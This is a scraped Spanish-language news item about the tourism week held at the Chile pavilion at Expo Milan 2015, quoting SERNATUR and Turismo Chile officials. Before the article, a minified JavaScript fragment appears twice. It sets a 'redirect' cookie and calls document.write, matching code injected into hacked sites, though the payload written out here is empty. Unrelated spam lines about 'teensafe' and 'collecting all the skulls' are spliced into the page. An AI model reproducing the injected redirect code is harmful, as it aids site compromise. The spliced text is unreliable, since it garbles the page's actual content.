=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} Ultra-special, ultra-secret, ultra-difficult sandbox level to unlock by how much is teensafe collecting all the skulls" /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} Ultra-special, ultra-secret, ultra-difficult sandbox level to unlock by how much is teensafe collecting all the skulls" />

Noticias

SEMANA DEL TURISMO EN PABELLÓN DE CHILE EN EXPO MILÁN

15 May 2015

Compartir:

Desde el 11 al 18 de mayo se está realizando la semana del turismo en el Pabellón de Chile en Expo Milán 2015. La iniciativa se enmarca dentro de la campaña del Servicio Nacional de Turismo, SERNATUR, junto a Turismo Chile, para dar a conocer la imagen país al resto del mundo.

La actividad, que se realiza todos los días desde las 10.00 horas hasta el cierre del pabellón, busca invitar al público a conocer los diferentes paisajes que existen en Chile. Es así como a través de un photocall, el visitante se toma una foto tipo postal con imágenes como: La Isla de Pascua, Chiloé, Atacama, Patagonia, Torres del Paine, la cual una vez terminado el recorrido del pabellón, es entregada para llevársela de recuerdo a sus hogares.

También están los oculus, una aplicación que la gente puede bajar desde su celular, y se muestran diferentes destinos como Santiago, Colchagua, Isla de Pascua, entre otros. El visitante lo ve en tres dimensiones, es un dron que se ve en 360°.

Solange Fuster, Subdirectora de Marketing del SERNATUR, señaló que “es una activación en torno a experiencias de viaje que pueden vivir los visitantes del pabellón en Chile. Los llevamos a que abran otros sentidos, la parte visual, que experimenten. Que se sientan inmersos en los paisajes chilenos y por supuesto de la gastronomía y bebidas que tenemos en nuestro país”.

Además de la actividad para el público en general, donde se han sacado más de 3.500 instantáneas, también se realizaron otras actividades dirigidas al canal comercial, que son los grandes dinamizadores del viajero. Por ello los días miércoles 13 y jueves 14 de mayo se realizaron dos seminarios para agentes de viajes y tour operadores y prensa.

“La idea era capacitarlos sobre los destinos innovadores que tenemos, que puedan traspasar las experiencias a sus clientes, que puedan armar nuevas alternativas de viaje y puedan ofrecerlas en sus distintos puntos de ventas”. “El proyecto es una belleza, tiene una calidez que muestra nuestra esencia, que somos un país hospitalario, que acoge, por lo tanto esa dimensión humana yo creo que está muy bien representada en el pabellón”, enfatizó Fuster.

Debbie Feldman, Gerente de mercados de Turismo Chile, también estuvo presenta en la semana de turismo, para ella “ha sido una tremenda experiencia, esta instancia te hace llegar al público final que es nuestro principal foco que se interesen en Chile como país y como destino turístico. Tuvimos muchos asistentes en las charlas. Los teleoperadores son el quinto país emisor de Europa hacia Chile. La convocatoria estuvo increíble, ellos tuvieron la experiencia de recorrer el pabellón, informarse sobre nuestro turismo y vivieron la experiencia del enoturismo, a través de unas catas de maridaje de vino y lógicamente probar la gastronomía chilena”. Ultra-special, ultra-secret, ultra-difficult sandbox level to unlock by how much is teensafe collecting all the skulls

Partners

Media Partner